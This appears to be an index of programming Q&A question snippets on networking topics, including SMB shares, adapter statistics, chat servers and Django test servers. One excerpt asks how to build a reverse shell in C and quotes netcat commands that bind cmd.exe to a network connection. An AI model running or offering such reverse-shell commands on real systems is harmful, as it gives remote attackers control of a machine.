
Is there any free network drive/share benchmark tool for Windows?

I want to know if there is any free tool to test the performance of a smb/CIFS network share. All free speed test I saw were for local drives only. ...

How to get network adapter stats in linux/Mac OSX?

I'm looking for a way to get hold of network stats in C on Linux and MacOSX. Specifically, I need to monitor the number of bytes uploaded and downloaded from each network adapter on the system - I don't need to do packet inspection, or differentiate between protocols, just a 'total bytes' counter which I can poll at intervals would be fi...

Tutorial for creation of packet in Linux kernel

I'm trying to understand the journey a piece of data undergoes through the linux kernel from application layer onto the wire in detail through the kernel. Does anyone know of a good place to start or a good tutorial? ...

How can I lock shared files on a linux network in Perl?

I have mounted a cifs file on two Linux machines. I have a Perl script which can modify the shared file. How do we lock the file over network in this scenario? ...

Using a bash script on a Mac to connect to network shares?

I'm using a Mac at work and would like some network shares mounting when i start the computer. Can i use a bash script (or similar) to connect and mount these shares? The shares are from both Windows and Mac servers and we usually connect using IP addresses. ...

Compiler running on a network

HI all , i am asking a quite descriptve question , so if possible suggest me some useful links or related information on how i can proceed to develop a network compiler (compiler that runs on the internet or LAN ) thanks & regards Shrey ...

Java Chat Server

I am writing a java based chat server and currently my design is based on following :- when a person in a chat room sends a message, the chatroom class at the server side, sends the same message to every participant in the room in a loop. Obviously , this is a poor design because networks calls are being made to individual participants i...

Network Shares of Removable Drives Disappear (Windows)

(Sorry if this sounds clumsy, I'm not always sure about the English terms for this) I have two removable drives. I can set the access rights so that they can be shared and used from another network computer, but when I start my main computer the next time and the drives are switched off, they seem to lose the share settings and I have t...

php access network path under windows

Hey there! within PHP (XAMPP) installed on a Windows XP Computer Im trying to read a dir which exists on a local network server. Im using is_dir() to check whether it is a dir that I can read. In Windows Explorer I type \\\server\dir and that dir is being shown. When I map a network drive a can access it with z:\dir as well. In PHP I...

How to handle message responses over (async) network communication (VB.NET)

I'm writing an app that sends messages over a network to another PC that processes the message and sends back a reply (e.g. a boolean or some other data). My network communication subs (based on WCF) just give me the ability to send a message to the other PC and process any received messages. The issue is that any response received is ...

P2P network games/apps: Good choice for a ""-like matching server

I'm making a network game (1v1) where in-game its p2p - no need for a game server. However, for players to be able to "find each other", without the need to coordinate in another medium and enter IP addresses (similar to the modem days of network games), I need to have a coordination/matching server. I can't use regular web hosting bec...

MS Access - OLE Server Error....HELP!!

So I developed this access database application (just the back end), on a lap top, and now I have tried to move it onto a network drive. The purpose of this thing is to track data for metrics, so there is a lot of data (700k rows at 15 fields for main table), and it runs these top N queries that it builds charts with... so i put it all ...

compact-framework cannot establish connection to network error

Trying to use pocket pc emulator (vs 2008) to connect to web service on my latop. No matter what I try I can't connect. I am using my laptop's IP address in the url. It works great from the url on my laptop, I just can't get the emulator to hit it and I keep getting the " cannot establish connection to network" exception. I have googled...

Manipulating Network Data in R

I have a data frame detailing edge weights among N nodes. Is there a package for working with this sort of data? For example, I would like to plot the following information as a network: p1 p2 counts 1 a b 100 2 a c 200 3 a d 100 4 b c 80 5 b d 90 6 b e 100 7 c d 100 8 c e 40 9 d e 60...

Programmatically connect to a wireless network under XP

Howdy, I'm trying to write an application that connects to my company's wireless network automatically on windows XP. I've found the Wireless LAN API but it requires me to have some hotfix installed on the machine, and you need to have sp2 or higher(There are machines with SP1, and I'm required to support any XP machine). I've tried ...

NS-2 filtering tracefile by node location

Is there an existing tool to filter an NS2 tracefile according to nodes' locations? I.e. only show events for nodes between x1,y1 and x2,y2. ...

Looking for a Basic Reverse Shell Example in C(++)

I'm trying to find a basic reverse shell example in C or C++, Basically I want to write a code to simulate the following netcat scenario: Listener: ------------------ C:\nc -L -p 80 Client -------------- C:\nc 80 -e cmd.exe For whom doesn't speak netcat: This means I want to redirect stdin and stdout from cmd.exe to netwo...

Event dispatched when network is disconnected while downloading files (URLs) for URLStream object

I am creating an AIR application which downloads file from a server. I am using URLstream object with complete, progress, IOError, security error and HTTP status events. I am not getting an event if the network is disconnected when the download is in progress. Please can anyone tell me which event is dispatched? Thanks, Anahas ...

How to delete network executable files in use during NAnt Build

Related: How to force delete a file? I have a NAnt script that does a full build and deployment to our Dev environment. Deploying the C#.Net Win exe and its used DLLs involves moving them to a network location, where our testers and other developers run them. <copy todir="${dest.dir}" overwrite="true" failonerror="false" > ...

How to specify which eth interface Django test server should listen on?

As the title says, in a multiple ethernet interfaces with multiple IP environment, the default Django test server is not attached to the network that I can access from my PC. Is there any way to specify the interface which Django test server should use? -- Added -- The network configuration is here. I'm connecting to the machine via 14...